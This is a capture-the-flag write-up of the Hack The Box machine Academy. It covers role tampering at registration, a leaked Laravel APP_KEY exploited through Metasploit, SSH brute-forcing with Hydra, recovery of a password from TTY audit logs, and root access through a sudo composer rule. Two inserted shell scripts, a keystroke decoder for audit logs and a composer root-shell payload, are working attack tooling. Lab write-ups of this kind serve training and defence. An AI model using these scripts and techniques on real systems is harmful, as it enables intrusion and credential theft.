Hack The Box — Academy

Introduction

Hello there! Thank you for taking the time to read my write-up of the recently retired machine Academy, from Hack The Box.

Academy is an Easy Linux machine that requires careful enumeration to complete.

What will be covered:
• Nmap
• Metasploit
• Credential Abuse
• GTFOBins

With that out of the way let’s get into it!

Scanning

To start things off, an Nmap scan is run on all 65,535 TCP ports in order to discover every service reachable from the attacking machine. This is a crucial step in any engagement because it gives the tester an idea of what type of system the target is, and it also helps identify potentially vulnerable services running on the host. This scan was run with the -sC -sV -T4 -v -p- flags set (default scripts, version detection, aggressive timing, verbose output, all ports). The -oN flag writes the scan to the nmap directory in normal .nmap format.

The scan reports three open ports on the host: 22 (SSH), 80 (HTTP) and 33060 (the MySQL X Protocol listener). Nmap reveals that port 80 redirects to http://academy.htb/, so I added academy.htb to the /etc/hosts file.

Web Application

The first thing I do is visit http://academy.htb/ to check out the site. There are two options on the main page: Login and Register. Hovering over the links reveals http://academy.htb/login.php and http://academy.htb/register.php.

I visit http://academy.htb/login.php first and try the username and password combination of admin:admin. The login works and the redirect lands on http://academy.htb/home.php.

After clicking around for a little bit I conclude that there is nothing of real interest here. The logged-in user is shown as egre55, so I take note of that and move on to http://academy.htb/register.php. This time I send the requests through Burp Suite.

I notice the roleid=0 parameter in the registration POST right away, so I change it to roleid=1 and forward the request. I revisit http://academy.htb/login.php, log in with test:test, and get the same results as before. While checking things out I guess http://academy.htb/admin.php and sure enough I get a separate login page. I try my created account test:test on it and get logged in. The server trusts a client-supplied role value, so anyone who registers can make themselves an administrator.

There is some valuable information that can be gathered from this page. The first thing I noticed was the hostname dev-staging-01.academy.htb, so I add that to the /etc/hosts file and keep moving. The next thing I gather from this page is two additional usernames, cry0l1t3 and mrb3n. Moving forward, I check out http://dev-staging-01.academy.htb/.

Poking around the development area, I found some more sensitive information: the staging site throws a Laravel debug error page that dumps the application's environment variables, including the APP_KEY. Laravel uses APP_KEY to encrypt and sign its cookies and tokens, so leaking it hands an attacker the ability to forge them.

Foothold

A quick Google search of "laravel exploit" brings me to an Exploit Database entry for a Metasploit module that exploits a token unserialize remote command execution vulnerability (CVE-2018-15133) in Laravel PHP Framework 5.5.40 / 5.6.x < 5.6.30. The bug is that Laravel decrypts the X-XSRF-TOKEN header with APP_KEY and passes the result to unserialize(), so anyone holding the key can submit a crafted serialized object that executes commands on the server.

I fire up the Metasploit Framework by executing msfconsole -q in the terminal. After running search laravel I am greeted with the module exploit/unix/http/laravel_token_unserialize_exec. I set the appropriate options, most importantly APP_KEY (taken from the debug page) along with RHOSTS, VHOST (dev-staging-01.academy.htb) and LHOST, before running the exploit.

Post-Exploitation

The shell lands as the www-data user. I make the shell more interactive by entering python3 -c 'import pty;pty.spawn("/bin/bash")'. After doing some enumeration in the directory where the shell landed, I decide to move on. I change into the /var/www/html/academy directory and run ls -la.

The first thing that stands out to me is the .env file. Running cat .env exposes the Laravel configuration, including the database password, which is another candidate for credential reuse.

I then add the usernames collected so far and the password to files and run Hydra against SSH to see whether any combination is a valid login.

user.txt

Hydra finds valid credentials for the cry0l1t3 user. Now that I have a valid username and password combination for SSH, I log in to get a better shell. At this point, I am able to get the user.txt flag.

As part of my standard methodology when working through Hack The Box machines, I automate some of the enumeration with LinPEAS from the Privilege Escalation Awesome Scripts SUITE (PEASS). I change into the /tmp directory and run wget to transfer the script to the box.

Lateral Movement

As the script runs, an interesting discovery is made. LinPEAS flags that the audit log under /var/log/audit is readable (cry0l1t3 is in the adm group), and checking it reveals the password typed for su mrb3n. The box has TTY auditing (pam_tty_audit) enabled, so every keystroke entered at a terminal, including the password given to the su prompt, is recorded as a hex-encoded type=TTY record. Passwords also turn up in plain authentication logs when users mistakenly type them into the username prompt, so audit and auth logs are always worth a look.
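The following is an added example, not code from the write-up, that shows how the leaked password is recovered from those records: it filters the type=TTY lines out of an audit log and hex-decodes their data field. The log lines it ships with are constructed to mimic the real format (a made-up password, not the one from the box); on a host you would point it at /var/log/audit/audit.log, and where the audit userspace tools are installed, aureport --tty gives the same view.

```sh
#!/bin/sh
# Added example (not from the write-up): recover keystrokes that pam_tty_audit has written
# to the audit log, the mechanism behind the leaked su password. On a host run:
#   extract_tty_input /var/log/audit/audit.log
# The file must be readable by the current user (e.g. via adm group membership).

# hex_to_ascii: decode a line of hex pairs from stdin. Enter (0x0d) is printed as <CR> and
# other non-printables as \xNN, so each audit record decodes onto a single line.
hex_to_ascii() {
  awk 'BEGIN { hex = "0123456789abcdef" }
  {
    s = tolower($0); out = ""
    for (i = 1; i < length(s); i += 2) {
      v = (index(hex, substr(s, i, 1)) - 1) * 16 + index(hex, substr(s, i + 1, 1)) - 1
      if (v == 13) out = out "<CR>"
      else if (v < 32 || v > 126) out = out sprintf("\\x%02x", v)
      else out = out sprintf("%c", v)
    }
    print out
  }'
}

# extract_tty_input FILE: print one line per type=TTY record in FILE as
# "pid=<pid> comm=<command> input=<decoded keystrokes>".
extract_tty_input() {
  grep '^type=TTY ' "$1" | while IFS= read -r rec; do
    pid=$(printf '%s\n' "$rec" | sed -n 's/.* pid=\([0-9]*\).*/\1/p')
    comm=$(printf '%s\n' "$rec" | sed -n 's/.* comm="\([^"]*\)".*/\1/p')
    data=$(printf '%s\n' "$rec" | sed -n 's/.* data=\([0-9A-Fa-f]*\).*/\1/p')
    printf 'pid=%s comm=%s input=%s\n' "$pid" "$comm" "$(printf '%s\n' "$data" | hex_to_ascii)"
  done
}

# sample_audit_log: writes a CONSTRUCTED audit.log (not the real one from the box) to a temp
# file and prints its path. The TTY records hold "su mrb3n" + Enter typed in bash, then the
# made-up password "Passw0rd!" + Enter typed at su's prompt; the USER_AUTH line is noise.
sample_audit_log() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=1002 ses=3 major=4 minor=1 comm="bash" data=7375206D7262336E0D
type=USER_AUTH msg=audit(1597199300.100:85): pid=2523 uid=1002 auid=1002 ses=3 msg='op=PAM:authentication grantors=pam_unix acct="mrb3n" exe="/usr/bin/su" res=success'
type=TTY msg=audit(1597199300.230:86): tty pid=2523 uid=1002 auid=1002 ses=3 major=4 minor=1 comm="su" data=5061737377307264210D
EOF
  printf '%s\n' "$f"
}
```

Running extract_tty_input on the sample prints the su command line from bash and then the password from the su process, which is exactly the pattern to look for: a type=TTY record with comm="su" (or sudo, ssh, mysql) whose decoded data ends in <CR>. The defensive takeaway is that TTY auditing captures secrets by design, so the audit log must not be readable by unprivileged groups such as adm.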

Running su mrb3n and supplying that password switches from the current cry0l1t3 user to mrb3n.

The mrb3n user has a sudo rule that will allow me to escalate to the root user.

root.txt

I know that the mrb3n user has a sudo rule from previous enumeration of the system. Running sudo -l reveals that /usr/bin/composer may be run as the root user.

A quick search on https://gtfobins.github.io/ reveals sudo privilege escalation instructions for composer: it executes whatever command is listed under "scripts" in a composer.json of your choosing, so a script entry that spawns /bin/sh runs as root.

I simply copy and paste this into my notes, add the full path for composer (/usr/bin/composer, so the command matches the sudo rule exactly), and paste it into the terminal session.
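As an added example (not the write-up's own commands), the snippet below wraps the GTFOBins composer technique so that the pieces can be checked before anything runs as root: a function that reads sudo -l output and confirms /usr/bin/composer is granted, a function that writes the malicious composer.json, and the final sudo call. The sudo -l text it ships with is constructed in the shape the write-up describes; the hostname academy and the rule itself are the only parts taken from the page.

```sh
#!/bin/sh
# Added example, not from the write-up: the GTFOBins `sudo composer` escalation, split into
# checkable steps. Only /usr/bin/composer and the (ALL) rule come from the page; the sample
# sudo -l output is constructed for illustration.

# sudo_allows_composer: return 0 when the text on stdin (output of `sudo -l`) contains a
# rule granting /usr/bin/composer as root, with or without NOPASSWD; 1 otherwise.
sudo_allows_composer() {
  grep -Eq '^[[:space:]]*\((ALL|root)([[:space:]]*:[^)]*)?\)[[:space:]]+(NOPASSWD:[[:space:]]*)?/usr/bin/composer([[:space:],]|$)'
}

# make_composer_payload DIR: write DIR/composer.json whose "scripts" entry execs an
# interactive shell on the inherited descriptors (the GTFOBins entry). Prints the path.
make_composer_payload() {
  dir="$1"
  printf '%s\n' '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > "$dir/composer.json"
  printf '%s\n' "$dir/composer.json"
}

# composer_root_shell: the escalation itself. The full path is used so the command matches
# the sudo rule; `run-script x` makes composer execute the "x" entry, now as root.
composer_root_shell() {
  TF=$(mktemp -d)
  make_composer_payload "$TF" >/dev/null
  sudo /usr/bin/composer --working-dir="$TF" run-script x
}

# sample_sudo_l: CONSTRUCTED `sudo -l` output in the shape the write-up describes.
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
EOF
}

# Typical use on the box: sudo -l | sudo_allows_composer && composer_root_shell
```

The root cause is the sudo rule, not composer: any tool that executes commands from a user-writable configuration file (package managers, build tools, editors, pagers) gives away root the moment it is allowed through sudo, so the fix is to remove the rule rather than to restrict composer's arguments.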

As a result, I am able to get the root.txt flag and complete the challenge! Again, thank you for taking the time to read this and stay tuned for more!

Mason Schmidt

Cybersecurity Professional